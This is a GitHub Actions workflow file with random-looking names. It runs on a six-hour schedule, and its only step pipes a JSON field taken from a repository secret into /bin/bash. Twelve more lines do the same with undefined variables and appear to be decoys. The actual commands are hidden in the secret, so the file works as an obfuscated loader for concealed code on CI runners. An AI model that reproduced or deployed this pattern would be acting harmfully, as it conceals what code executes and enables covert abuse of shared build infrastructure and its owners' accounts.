name: aspectangle
on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: aspectangle
        env:
          ne53: ${{ secrets.ne53 }}
        run: |
          echo $ne53 | jq -r .bfr95 | /bin/bash
          echo $dmd80 | jq -r .nhptw8 | /bin/bash
          echo $ypoew1 | jq -r .s33757 | /bin/bash
          echo $fchnz58292 | jq -r .zmjzl0917 | /bin/bash
          echo $xgev489 | jq -r .ejpeu67 | /bin/bash
          echo $xmf153 | jq -r .w6 | /bin/bash
          echo $hvy98883 | jq -r .s767 | /bin/bash
          echo $f35280 | jq -r .hq3 | /bin/bash
          echo $id1190 | jq -r .isfpc2778 | /bin/bash
          echo $gnm9628 | jq -r .zcp24031 | /bin/bash
          echo $r8303 | jq -r .os85044 | /bin/bash
          echo $us1518 | jq -r .i1 | /bin/bash
          echo $r194 | jq -r .n50 | /bin/bash

